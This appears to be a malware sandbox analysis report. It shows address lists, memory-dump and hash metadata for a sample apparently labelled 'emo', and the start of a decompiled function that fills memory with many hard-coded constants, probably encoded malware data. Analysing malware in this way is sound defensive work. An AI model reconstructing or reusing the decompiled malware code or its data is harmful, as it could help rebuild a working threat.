0x041d58fd
0x041d5900
0x00000000
0x00000000
0x00000000
0x041d5900
0x00000000
0x041d58f8
0x041d5d87
0x041d5bbe
0x041d5bbe
0x041d5bc0
0x041d5bc3
0x041d5bc5
0x041d5bec
0x041d5bee
0x041d5bf1
0x041d5bf3
0x041d5bf5
0x041d5bf8
0x041d5bf8
0x041d5bfa
0x041d5bfa
0x041d5bfa
0x041d5bfd
0x041d5c00
0x00000000
0x00000000
0x041d5c02
0x041d5c02
0x041d5c04
0x041d5c42
0x041d5c42
0x041d5c45
0x041d655f
0x041d655f
0x00000000
0x041d5c4b
0x041d5c4b
0x041d5c4b
0x041d5c4d
0x041d5c4e
0x041d5c55
0x041d5c56
0x00000000
0x041d5c56
0x041d5c06
0x041d5c06
0x041d5c06
0x041d5c09
0x041d5c2f
0x041d5c2f
0x041d5c36
0x041d5c39
0x041d5c3c
0x041d5c3d
0x00000000
0x041d5c0b
0x041d5c0b
0x041d5c0b
0x041d5c0b
0x041d5c0e
0x00000000
0x00000000
0x041d5c14
0x041d5c19
0x041d5c1b
0x041d5c1c
0x041d5c1e
0x041d5c21
0x041d5c24
0x041d5c27
0x041d5c2a
0x00000000
0x041d5c2c
0x041d5c2c
0x041d5c2c
0x00000000
0x041d5c2c
0x00000000
0x041d5c2a
0x041d6554
0x041d6554
0x00000000
0x041d6554
0x041d5c09
0x00000000
0x041d5c04
0x041d5c5b
0x041d5c6e
0x041d5c75
0x041d5c8a
0x041d5c8d
0x041d6662
0x041d6662
0x041d6669
0x00000000
0x041d5c93
0x041d5c93
0x041d5c93
0x041d5c96
0x041d5c96
0x041d5c96
0x041d5c98
0x00000000
0x00000000
0x041d5c9e
0x041d5c9e
0x041d5ca0
0x041d5cfc
0x041d5cfc
0x041d5cff
0x041d5cff
0x041d5cff
0x041d5d01
0x00000000
0x00000000
0x041d5d11
0x041d5d11
0x041d5d14
0x041d5d16
0x041d5d30
0x041d5d30
0x041d5d33
0x041d5d35
0x041d6587
0x041d6587
0x041d658a
0x00000000
0x041d5d3b
0x041d5d3b
0x041d5d3b
0x041d5d40
0x041d5d42
0x041d5d46
0x041d5d49
0x041d5d4b
0x041d5d54
0x041d5d4d
0x041d5d4d
0x041d5d4f
0x041d5d4f
0x041d5d56
0x041d5d5b
0x041d5d5b
0x041d5d64
0x041d5d69
0x041d5d6b
0x041d5d6e
0x041d5d71
0x041d5d73
0x041d5d76
0x00000000
0x041d5d76
0x041d5d18
0x041d5d18
0x041d5d18
0x041d5d1b
0x041d5d22
0x00000000
0x041d5d22
0x00000000
0x041d5d16
0x041d5d03
0x041d5d03
0x041d5d08
0x00000000
0x041d5ca2
0x041d5ca2
0x041d5ca2
0x041d5ca5
0x041d5cc8
0x041d5cc8
0x041d5ccb
0x041d5cce
0x041d5cd1
0x041d5cd4
0x041d5cdc
0x041d5cdf
0x041d5ce2
0x041d5ce5
0x041d6575
0x041d6575
0x041d657c
0x00000000
0x041d5ceb
0x041d5ceb
0x041d5cee
0x041d5cf1
0x041d5cf6
0x041d5cf7
0x00000000
0x041d5cf7
0x041d5ca7
0x041d5ca7
0x041d5ca7
0x041d5ca7
0x041d5caa
0x00000000
0x00000000
0x041d5cb0
0x041d5cb5
0x041d5cb7
0x041d5cb8
0x041d5cba
0x041d5cbd
0x041d5cc0
0x041d5cc3
0x041d5cc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5cc6
0x041d656a
0x041d656a
0x00000000
0x041d656a
0x041d5ca5
0x00000000
0x041d5ca0
0x00000000
0x041d5c96
0x041d5bc7
0x041d5bc7
0x041d5bc7
0x041d5bc7
0x041d5bca
0x00000000
0x00000000
0x041d5bd0
0x041d5bd5
0x041d5bd7
0x041d5bda
0x041d5bdc
0x041d5bdf
0x041d5be2
0x041d5be5
0x041d5be8
0x041d5bea
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5bea
0x041d6549
0x041d6549
0x00000000
0x041d6549
0x041d5bc5
0x041d5b7e
0x041d5b7e
0x041d5b7e
0x041d5b7e
0x041d5b81
0x00000000
0x00000000
0x041d5b87
0x041d5b8c
0x041d5b8e
0x041d5b8f
0x041d5b91
0x041d5b94
0x041d5b97
0x041d5b9a
0x041d5b9d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5b9d
0x041d653e
0x041d653e
0x00000000
0x041d653e
0x00000000
0x041d5b7c
0x041d65c1
0x041d65c3
0x041d65c6
0x041d65c8
0x041d65f2
0x041d65f2
0x041d65f7
0x041d65fa
0x041d65fc
0x041d65fe
0x041d6601
0x041d6603
0x041d6605
0x041d6605
0x041d6605
0x041d6608
0x00000000
0x00000000
0x041d660a
0x041d660a
0x041d660b
0x041d660e
0x041d6610
0x00000000
0x00000000
0x00000000
0x041d6610
0x041d6605
0x041d6612
0x041d6617
0x041d6617
0x041d661b
0x041d661e
0x041d6621
0x041d6624
0x041d6626
0x041d6629
0x041d662d
0x041d6630
0x041d6634
0x041d6752
0x041d6752
0x041d6752
0x041d6754
0x00000000
0x041d663a
0x041d663a
0x041d663a
0x041d6703
0x041d6703
0x041d6703
0x041d6706
0x041d6709
0x00000000
0x00000000
0x041d670b
0x041d670b
0x041d670d
0x041d671a
0x041d671a
0x041d671d
0x041d6720
0x041d66e7
0x041d66e7
0x041d66ed
0x041d66ed
0x041d66f0
0x00000000
0x041d6722
0x041d6722
0x041d66ca
0x041d66ca
0x041d66ca
0x041d66cd
0x00000000
0x00000000
0x041d66cf
0x041d66d4
0x041d66d6
0x041d66d9
0x041d66db
0x041d66dc
0x041d66df
0x041d66e2
0x00000000
0x041d66e4
0x041d66e4
0x041d66e4
0x00000000
0x041d66e4
0x00000000
0x041d66e2
0x041d672c
0x041d672c
0x00000000
0x041d672c
0x041d670f
0x041d670f
0x041d670f
0x041d6712
0x041d6724
0x041d6724
0x00000000
0x041d6714
0x041d6714
0x041d6714
0x041d6717
0x041d66f3
0x041d66f3
0x041d66fc
0x041d66ff
0x041d66ff
0x041d6700
0x00000000
0x041d6700
0x041d6712
0x00000000
0x041d670d
0x00000000
0x041d6703
0x041d65d0
0x00000000
0x041d65d0
0x041d65d0
0x041d65d0
0x041d65d3
0x00000000
0x00000000
0x041d65d9
0x041d65e0
0x041d65e3
0x041d65e5
0x041d65e8
0x041d65eb
0x041d65ee
0x041d65f0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d65f0
0x041d66c2
0x041d66c2
0x00000000
0x041d66c2
0x041d65c8
0x041d5995
0x041d5995
0x041d5995
0x041d5998
0x041d599a
0x041d599e
0x041d59a0
0x041d59a3
0x041d59a6
0x041d59ae
0x041d59b3
0x041d59b6
0x041d59b6
0x041d59b9
0x041d59b9
0x041d59c3
0x041d59cb
0x041d59ce
0x041d59d0
0x041d59d9
0x041d59d9
0x041d59de
0x041d59df
0x041d59e0
0x041d59e1
0x041d59e1
0x041d59e5
0x041d59e7
0x041d59ed
0x041d59f5
0x041d59f5
0x041d59f9
0x041d59fc
0x041d59d2
0x041d59d2
0x041d59d4
0x041d59d4
0x041d59ff
0x041d59ff
0x041d5a02
0x041d5a04
0x041d5a09
0x041d5a0c
0x041d5a0e
0x041d5a11
0x041d5a17
0x041d5b57
0x041d5b57
0x041d5b57
0x041d5b57
0x00000000
0x041d5a1d
0x041d5a1d
0x041d5a1d
0x041d5a20
0x041d5a26
0x041d58f8
0x041d58f8
0x041d58fb
0x041d58fd
0x041d5900
0x00000000
0x00000000
0x00000000
0x041d5900
0x041d58f8
0x041d5a17
0x041d598f
0x00000000
0x041d5a2e
0x041d5a2e
0x041d5a31
0x041d5ae3
0x041d5aea
0x041d5af2
0x041d5af5
0x041d5af7
0x041d5b08
0x041d5b08
0x041d5b0d
0x041d5b0e
0x041d5b0f
0x041d5b10
0x041d5b10
0x041d5b14
0x041d5b16
0x041d5b1a
0x041d5b1c
0x041d5b24
0x041d5b24
0x041d5b28
0x041d5b2b
0x041d5af9
0x041d5af9
0x041d5afb
0x041d5afe
0x041d5b03
0x041d5b03
0x041d5b2e
0x041d5b2e
0x041d5b30
0x041d5b32
0x041d5b35
0x041d5b38
0x041d5b3e
0x00000000
0x041d5b40
0x041d5b40
0x041d5b40
0x041d5b43
0x041d5b46
0x041d652c
0x041d652c
0x041d6533
0x00000000
0x041d5b4c
0x041d5b4c
0x041d5b4c
0x041d5b4f
0x00000000
0x041d5b4f
0x041d5b46
0x041d5a37
0x041d5a37
0x041d5a37
0x041d5a3a
0x041d5abf
0x041d5abf
0x041d5ac6
0x041d5ac9
0x041d5ace
0x041d5ad4
0x041d5ad7
0x041d5ada
0x041d5ada
0x041d5add
0x00000000
0x041d5a40
0x041d5a40
0x041d5a40
0x041d5a42
0x041d5a47
0x041d5a4f
0x041d5a51
0x041d5a64
0x041d5a64
0x041d5a67
0x00000000
0x041d5a69
0x041d5a69
0x041d5a6e
0x041d5a71
0x041d5a71
0x041d5a7f
0x041d5a8a
0x041d5a8b
0x041d5a8e
0x041d5a90
0x00000000
0x00000000
0x041d5a92
0x041d5a92
0x041d5a95
0x041d5a97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5a97
0x00000000
0x041d5a71
0x041d5a53
0x041d5a53
0x041d5a53
0x041d5a56
0x041d5a58
0x041d5a99
0x041d5a99
0x041d5a9c
0x041d5a9c
0x041d5a9f
0x041d6521
0x041d6521
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5a5a
0x041d5a5a
0x041d5a5a
0x041d5a5c
0x041d5ae0
0x041d5ae0
0x00000000
0x041d5a62
0x041d5a62
0x00000000
0x041d5a62
0x041d5a5c
0x041d5a58
0x00000000
0x041d5aa5
0x041d5aa8
0x041d5aaa
0x041d5aac
0x041d5aad
0x041d5aaf
0x041d5ab2
0x041d5ab5
0x041d5ab8
0x041d5ab8
0x00000000
0x041d5abd
0x041d5a3a
0x00000000
0x041d5a31
0x041d58f8
0x041d66b4
0x041d66b4
0x041d66b4
0x041d66b7
0x041d675a
0x041d675a
0x00000000
0x041d675a
0x041d5780
0x041d5780
0x041d5782
0x041d57a7
0x041d57ac
0x041d57b1
0x041d57b3
0x041d57b5
0x041d57b8
0x041d57bb
0x00000000
0x041d5784
0x00000000
0x041d5784
0x041d5792
0x041d5794
0x041d5795
0x041d5798
0x041d579a
0x041d579d
0x041d57a0
0x041d57a5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d57a5
0x041d664c
0x041d6732
0x041d6732
0x041d673b
0x041d6740
0x041d6740
0x041d6743
0x041d6746
0x041d6749
0x041d674b
0x041d674b
0x041d674e
0x041d6750
0x041d675d
0x041d675d
0x041d6760
0x041d6762
0x041d6764
0x041d6764
0x041d6764
0x041d6767
0x00000000
0x00000000
0x041d6769
0x041d6769
0x041d676a
0x041d676d
0x041d676f
0x00000000
0x00000000
0x00000000
0x041d676f
0x041d6764
0x041d6762
0x041d674e
0x041d6749
0x041d5782
0x00000000
0x041d5736
0x041d5736
0x041d573b
0x041d573c
0x041d573d
0x041d5740
0x041d5740
0x041d5744
0x041d5746
0x041d574c
0x041d5754
0x041d5754
0x041d5758
0x041d575b
0x041d575e
0x00000000
0x041d575e
0x041d5714
0x041d6771
0x041d6771
0x041d6774
0x041d6776
0x041d677b
0x041d677e
0x041d6781
0x041d6784
0x041d6786
0x041d6789
0x041d6793
0x041d679e
0x041d67a1
0x041d67a5
0x041d67ab
0x041d67b1
0x041d67b7
0x041d67ba
0x041d67bd
0x041d67c2
0x041d67c5
0x041d67c7
0x041d67cd
0x041d67cd
0x041d67cf
0x041d67d5
0x041d67d5
0x041d67df
0x041d67e5
0x041d67ee
0x041d67f1
0x041d67f4
0x041d67f6
0x041d67fa
0x041d67fd
0x041d6803
0x041d6803
0x041d6805
0x041d6805
0x041d6805
0x041d6807
0x041d680a
0x041d680d
0x041d6813
0x041d6813
0x041d6818
0x041d6819
0x041d681a
0x041d681b
0x041d681b
0x041d681b
0x041d6820
0x041d6820
0x041d6823
0x041d6826
0x041d6831
0x041d683c
0x041d6847
0x041d6852
0x041d685d
0x041d6868
0x041d6873
0x041d6878
0x041d687b
0x041d687d
0x041d6882
0x041d6884
0x041d6884
0x041d6889
0x041d688c
0x041d688c
0x041d688f
0x041d688f
0x041d6891
0x041d6894
0x041d6896
0x041d6898
0x041d689c
0x041d689f
0x041d68a1
0x041d68a1
0x041d68a6
0x041d68ae
0x041d68b2
0x041d68b2
0x041d68b6
0x041d68c0
0x041d68c0
0x041d68c3
0x041d68c5
0x041d68c9
0x041d68cb
0x041d68ce
0x041d68d0
0x041d68d2
0x041d68d2
0x041d68d2
0x041d68d5
0x041d68d8
0x041d68db
0x041d68de
0x041d68e1
0x041d68e1
0x041d68e4
0x041d68e4
0x041d68e6
0x041d68e8
0x041d68ee
0x041d68f0
0x041d68f2
0x041d68f2
0x041d68f3
0x041d68f3
0x041d68f6
0x041d68f9
0x041d68fb
0x041d68fb
0x041d68fb
0x041d68fd
0x041d6902
0x041d690d
0x041d6919
0x041d691f
0x041d6921
0x041d6921
0x041d6921
0x041d6924
0x041d6929
0x041d692c
0x041d692c
0x041d6935
0x041d693a
0x041d693a
0x041d693b
0x041d693e
0x041d6940
0x041d6943
0x041d6945
0x041d6947
0x041d694b
0x041d694d
0x041d6955
0x041d6955
0x041d6955
0x041d694b
0x041d6945
0x041d67cf
0x041d6958
0x041d6960
0x00000000
0x041d6960
0x041d6657
0x041d6657
0x00000000

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd328becabf5eb7642f5b2386311922473fc48bbeab5a6da20db5f4030c052d
Instruction ID: fad9e8ff88587669e4ee30032e9ed3a21635eb60a06d0b332f3be2df456a311c
Opcode Fuzzy Hash: fcd328becabf5eb7642f5b2386311922473fc48bbeab5a6da20db5f4030c052d
Instruction Fuzzy Hash: 7A126DB1E0062AEFCF18CF69C8D02FDBBB2BF44310F15456AD866A7644D734AA41DB94

Uniqueness

Uniqueness Score: -1.00%

Function 041B2E50, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.655502185.00000000041B0000.00000040.00000001.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000000.00000002.655508379.00000000041B6000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41b0000_emo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac90351330eb48dab2da4422447e890122f804683ac586dc6d605b96e763534
Instruction ID: 2e9584ef1ed91c818559f255f6b29960aadc714a16b121bded121146584dd9f1
Opcode Fuzzy Hash: 8ac90351330eb48dab2da4422447e890122f804683ac586dc6d605b96e763534
Instruction Fuzzy Hash: CA2194B5E002199F8B04CFAED9854EEFBF5FF48210B55816AE855B7310D330A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 041D1530, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3b20853c12e01583646f0bc9b5b796af15d36b12eeb5013d60b718caa977e6
Instruction ID: 4e56275f8333fa54be675fea6c0b8aff49e46f17b8883322ff81132f73ae52ac
Opcode Fuzzy Hash: fb3b20853c12e01583646f0bc9b5b796af15d36b12eeb5013d60b718caa977e6
Instruction Fuzzy Hash: BBE0C273A40410EBE7319E8888C0925F7BAEB866A0B2B045AD59AA3601C338BC008650

Uniqueness

Uniqueness Score: -1.00%

Function 041D21B0, Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00

Uniqueness

Uniqueness Score: -1.00%

Function 041D814A, Relevance: 40.7, APIs: 1, Strings: 22, Instructions: 464
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E041D814A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t448;
				void* _t458;

				_t448 = __ebx;
				 *((intOrPtr*)(_t458 - 0x6e8)) = 0x93d3353a;
				 *((intOrPtr*)(_t458 - 0x6e4)) = 0x4605c826;
				 *((intOrPtr*)(_t458 - 0x6e0)) = 0xc6958939;
				 *((intOrPtr*)(_t458 - 0x6dc)) = 0x5dab499d;
				 *((intOrPtr*)(_t458 - 0x6d8)) = 0x1f7e8fb9;
				 *((intOrPtr*)(_t458 - 0x6d4)) = 0xb995c187;
				 *((intOrPtr*)(_t458 - 0x6d0)) = 0xcdd546ff;
				 *((intOrPtr*)(_t458 - 0x6cc)) = 0x37094802;
				 *((intOrPtr*)(_t458 - 0x6c8)) = 0x8cdc2e4e;
				 *((intOrPtr*)(_t458 - 0x6c4)) = 0xb320bfb1;
				 *((intOrPtr*)(_t458 - 0x6c0)) = 0xcb1e7a8c;
				 *((intOrPtr*)(_t458 - 0x6bc)) = 0xe57104cd;
				 *((intOrPtr*)(_t458 - 0x6b8)) = 0xc2acaa27;
				 *((intOrPtr*)(_t458 - 0x6b4)) = 0xfffc7ea3;
				 *((intOrPtr*)(_t458 - 0x6b0)) = 0x12a7a295;
				 *((intOrPtr*)(_t458 - 0x6ac)) = 0x68e5d236;
				 *((intOrPtr*)(_t458 - 0x6a8)) = 0x11b4886f;
				 *((intOrPtr*)(_t458 - 0x6a4)) = 0xbfceef8b;
				 *((intOrPtr*)(_t458 - 0x6a0)) = 0x5c189831;
				 *((intOrPtr*)(_t458 - 0x69c)) = 0x7dd922bc;
				 *((intOrPtr*)(_t458 - 0x698)) = 0x69467954;
				 *((intOrPtr*)(_t458 - 0x694)) = 0x7a42d677;
				 *((intOrPtr*)(_t458 - 0x690)) = 0xa9b05d05;
				 *((intOrPtr*)(_t458 - 0x68c)) = 0x2e47771d;
				 *((intOrPtr*)(_t458 - 0x688)) = 0xf9d08660;
				 *((intOrPtr*)(_t458 - 0x684)) = 0xac9f16f9;
				 *((intOrPtr*)(_t458 - 0x680)) = 0xf9ff3cde;
				 *((intOrPtr*)(_t458 - 0x67c)) = 0xb042b119;
				 *((intOrPtr*)(_t458 - 0x678)) = 0xf29da24a;
				 *((intOrPtr*)(_t458 - 0x674)) = 0x8188d25d;
				 *((intOrPtr*)(_t458 - 0x670)) = 0xd3ff17b;
				 *((intOrPtr*)(_t458 - 0x66c)) = 0x3ee260bb;
				 *((intOrPtr*)(_t458 - 0x668)) = 0xea9b113f;
				 *((intOrPtr*)(_t458 - 0x664)) = 0xa69ba4c8;
				 *((intOrPtr*)(_t458 - 0x660)) = 0xcfa9a480;
				 *((intOrPtr*)(_t458 - 0x65c)) = 0x52f53b2;
				 *((intOrPtr*)(_t458 - 0x658)) = 0x3ad8d9c2;
				 *((intOrPtr*)(_t458 - 0x654)) = 0x558a60e2;
				 *((intOrPtr*)(_t458 - 0x650)) = 0x378d8bfd;
				 *((intOrPtr*)(_t458 - 0x64c)) = 0xb18c5bb6;
				 *((intOrPtr*)(_t458 - 0x648)) = 0xe3ead4c5;
				 *((intOrPtr*)(_t458 - 0x644)) = 0xcc66d316;
				 *((intOrPtr*)(_t458 - 0x640)) = 0x6cd91144;
				 *((intOrPtr*)(_t458 - 0x63c)) = 0xb3b9e0c4;
				 *((intOrPtr*)(_t458 - 0x638)) = 0x6f5bc14b;
				 *((intOrPtr*)(_t458 - 0x634)) = 0x917aba4d;
				 *((intOrPtr*)(_t458 - 0x630)) = 0x8c6a56e7;
				 *((intOrPtr*)(_t458 - 0x62c)) = 0x52431b0a;
				 *((intOrPtr*)(_t458 - 0x628)) = 0x9ad32afb;
				 *((intOrPtr*)(_t458 - 0x624)) = 0xcfb02ab7;
				 *((intOrPtr*)(_t458 - 0x620)) = 0xe30927ea;
				 *((intOrPtr*)(_t458 - 0x61c)) = 0xdea47ec0;
				 *((intOrPtr*)(_t458 - 0x618)) = 0x3d024311;
				 *((intOrPtr*)(_t458 - 0x614)) = 0x60be170e;
				 *((intOrPtr*)(_t458 - 0x610)) = 0xcaf73f3b;
				 *((intOrPtr*)(_t458 - 0x60c)) = 0x22c4eb47;
				 *((intOrPtr*)(_t458 - 0x608)) = 0xc459bbe2;
				 *((intOrPtr*)(_t458 - 0x604)) = 0xcaea007f;
				 *((intOrPtr*)(_t458 - 0x600)) = 0xcfd92684;
				 *((intOrPtr*)(_t458 - 0x5fc)) = 0x4b4e9076;
				 *((intOrPtr*)(_t458 - 0x5f8)) = 0x42ebe20;
				 *((intOrPtr*)(_t458 - 0x5f4)) = 0x5078dd2d;
				 *((intOrPtr*)(_t458 - 0x5f0)) = 0xda2de6b;
				 *((intOrPtr*)(_t458 - 0x5ec)) = 0xc5a3da79;
				 *((intOrPtr*)(_t458 - 0x5e8)) = 0xf0236b52;
				 *((intOrPtr*)(_t458 - 0x5e4)) = 0xa1142609;
				 *((intOrPtr*)(_t458 - 0x5e0)) = 0x64ca20fc;
				 *((intOrPtr*)(_t458 - 0x5dc)) = 0x519b188f;
				 *((intOrPtr*)(_t458 - 0x5d8)) = 0xe73aa59f;
				 *((intOrPtr*)(_t458 - 0x5d4)) = 0x5946dd5a;
				 *((intOrPtr*)(_t458 - 0x5d0)) = 0xa600ca7c;
				 *((intOrPtr*)(_t458 - 0x5cc)) = 0xb9066eda;
				 *((intOrPtr*)(_t458 - 0x5c8)) = 0x9f617e3a;
				 *((intOrPtr*)(_t458 - 0x5c4)) = 0x7e87a24d;
				 *((intOrPtr*)(_t458 - 0x5c0)) = 0x3fd259ea;
				 *((intOrPtr*)(_t458 - 0x5bc)) = 0x145456ef;
				 *((intOrPtr*)(_t458 - 0x5b8)) = 0xa963e5e2;
				 *((intOrPtr*)(_t458 - 0x5b4)) = 0xc52f05eb;
				 *((intOrPtr*)(_t458 - 0x5b0)) = 0x164156b2;
				 *((intOrPtr*)(_t458 - 0x5ac)) = 0x3a510a47;
				 *((intOrPtr*)(_t458 - 0x5a8)) = 0xe3c9968b;
				 *((intOrPtr*)(_t458 - 0x5a4)) = 0x9c8cc5c;
				 *((intOrPtr*)(_t458 - 0x5a0)) = 0xd2e2368f;
				 *((intOrPtr*)(_t458 - 0x59c)) = 0xa637d7f9;
				 *((intOrPtr*)(_t458 - 0x598)) = 0x779a00f1;
				 *((intOrPtr*)(_t458 - 0x594)) = 0xe5ba1aff;
				 *((intOrPtr*)(_t458 - 0x590)) = 0xde30a087;
				 *((intOrPtr*)(_t458 - 0x58c)) = 0xd7b46516;
				 *((intOrPtr*)(_t458 - 0x588)) = 0x5738762d;
				 *((intOrPtr*)(_t458 - 0x584)) = 0xbb19243e;
				 *((intOrPtr*)(_t458 - 0x580)) = 0x363e0993;
				 *((intOrPtr*)(_t458 - 0x57c)) = 0x36980fe4;
				 *((intOrPtr*)(_t458 - 0x578)) = 0x55d743a6;
				 *((intOrPtr*)(_t458 - 0x574)) = 0x68affd74;
				 *((intOrPtr*)(_t458 - 0x570)) = 0x3c792d4;
				 *((intOrPtr*)(_t458 - 0x56c)) = 0x2d4c203d;
				 *((intOrPtr*)(_t458 - 0x568)) = 0x6d5f18a;
				 *((intOrPtr*)(_t458 - 0x564)) = 0xb9628181;
				 *((intOrPtr*)(_t458 - 0x560)) = 0xda670d38;
				 *((intOrPtr*)(_t458 - 0x55c)) = 0xc8a43992;
				 *((intOrPtr*)(_t458 - 0x558)) = 0x5c0f7588;
				 *((intOrPtr*)(_t458 - 0x554)) = 0x2c25a171;
				 *((intOrPtr*)(_t458 - 0x550)) = 0x211f522;
				 *((intOrPtr*)(_t458 - 0x54c)) = 0xe76860ea;
				 *((intOrPtr*)(_t458 - 0x548)) = 0xd665a1e9;
				 *((intOrPtr*)(_t458 - 0x544)) = 0xd6ec39a3;
				 *((intOrPtr*)(_t458 - 0x540)) = 0xf6a2a8e0;
				 *((intOrPtr*)(_t458 - 0x53c)) = 0xb6f2f712;
				 *((intOrPtr*)(_t458 - 0x538)) = 0xca3453dc;
				 *((intOrPtr*)(_t458 - 0x534)) = 0xb977fc83;
				 *((intOrPtr*)(_t458 - 0x530)) = 0x5d7f07a8;
				 *((intOrPtr*)(_t458 - 0x52c)) = 0x7e1dc698;
				 *((intOrPtr*)(_t458 - 0x528)) = 0xcb981af7;
				 *((intOrPtr*)(_t458 - 0x524)) = 0x68e3c94;
				 *((intOrPtr*)(_t458 - 0x520)) = 0x5c60ae92;
				 *((intOrPtr*)(_t458 - 0x51c)) = 0x9c9671b5;
				 *((intOrPtr*)(_t458 - 0x518)) = 0x1c4f9608;
				 *((intOrPtr*)(_t458 - 0x514)) = 0xca403f30;
				 *((intOrPtr*)(_t458 - 0x510)) = 0x5dd9a9ed;
				 *((intOrPtr*)(_t458 - 0x50c)) = 0x66335b60;
				 *((intOrPtr*)(_t458 - 0x508)) = 0xbcc96e3a;
				 *((intOrPtr*)(_t458 - 0x504)) = 0xa2d91c00;
				 *((intOrPtr*)(_t458 - 0x500)) = 0xe613adb9;
				 *((intOrPtr*)(_t458 - 0x4fc)) = 0x6616b77e;
				 *((intOrPtr*)(_t458 - 0x4f8)) = 0xabe5552b;
				 *((intOrPtr*)(_t458 - 0x4f4)) = 0xb8ff5ee6;
				 *((intOrPtr*)(_t458 - 0x4f0)) = 0x2086c469;
				 *((intOrPtr*)(_t458 - 0x4ec)) = 0xe0239dc3;
				 *((intOrPtr*)(_t458 - 0x4e8)) = 0xc3263e1a;
				 *((intOrPtr*)(_t458 - 0x4e4)) = 0x428ec360;
				 *((intOrPtr*)(_t458 - 0x4e0)) = 0xf9a13680;
				 *((intOrPtr*)(_t458 - 0x4dc)) = 0xabaefaf3;
				 *((intOrPtr*)(_t458 - 0x4d8)) = 0xaf94009f;
				 *((intOrPtr*)(_t458 - 0x4d4)) = 0x56fe2ec9;
				 *((intOrPtr*)(_t458 - 0x4d0)) = 0x5071d23e;
				 *((intOrPtr*)(_t458 - 0x4cc)) = 0xfff752a2;
				 *((intOrPtr*)(_t458 - 0x4c8)) = 0xac4fe0c7;
				 *((intOrPtr*)(_t458 - 0x4c4)) = 0x2ba7b1;
				 *((intOrPtr*)(_t458 - 0x4c0)) = 0xf5e502cf;
				 *((intOrPtr*)(_t458 - 0x4bc)) = 0xa1cf24e7;
				 *((intOrPtr*)(_t458 - 0x4b8)) = 0x72420150;
				 *((intOrPtr*)(_t458 - 0x4b4)) = 0xd803a74a;
				 *((intOrPtr*)(_t458 - 0x4b0)) = 0x3e6b43d;
				 *((intOrPtr*)(_t458 - 0x4ac)) = 0x5d5d6469;
				 *((intOrPtr*)(_t458 - 0x4a8)) = 0xdda071a9;
				 *((intOrPtr*)(_t458 - 0x4a4)) = 0x68eb4f5c;
				 *((intOrPtr*)(_t458 - 0x4a0)) = 0x3de89dae;
				 *((intOrPtr*)(_t458 - 0x49c)) = 0xf4b9f51d;
				 *((intOrPtr*)(_t458 - 0x498)) = 0xaa80dabf;
				 *((intOrPtr*)(_t458 - 0x494)) = 0x1757af66;
				 *((intOrPtr*)(_t458 - 0x490)) = 0x4ee339e6;
				 *((intOrPtr*)(_t458 - 0x48c)) = 0x4845057f;
				 *((intOrPtr*)(_t458 - 0x488)) = 0xc184ba6d;
				 *((intOrPtr*)(_t458 - 0x484)) = 0xeb8bbfab;
				 *((intOrPtr*)(_t458 - 0x480)) = 0xae13fe43;
				 *((intOrPtr*)(_t458 - 0x47c)) = 0xbd14a503;
				 *((intOrPtr*)(_t458 - 0x478)) = 0x9ca6134c;
				 *((intOrPtr*)(_t458 - 0x474)) = 0x5fdde9a3;
				 *((intOrPtr*)(_t458 - 0x470)) = 0x399a2512;
				 *((intOrPtr*)(_t458 - 0x46c)) = 0x6526db0;
				 *((intOrPtr*)(_t458 - 0x468)) = 0x5bba9685;
				 *((intOrPtr*)(_t458 - 0x464)) = 0x89becd2b;
				 *((intOrPtr*)(_t458 - 0x460)) = 0x6fbbf825;
				 *((intOrPtr*)(_t458 - 0x45c)) = 0x6c94c415;
				 *((intOrPtr*)(_t458 - 0x458)) = 0xdbed85bd;
				 *((intOrPtr*)(_t458 - 0x454)) = 0x443e979e;
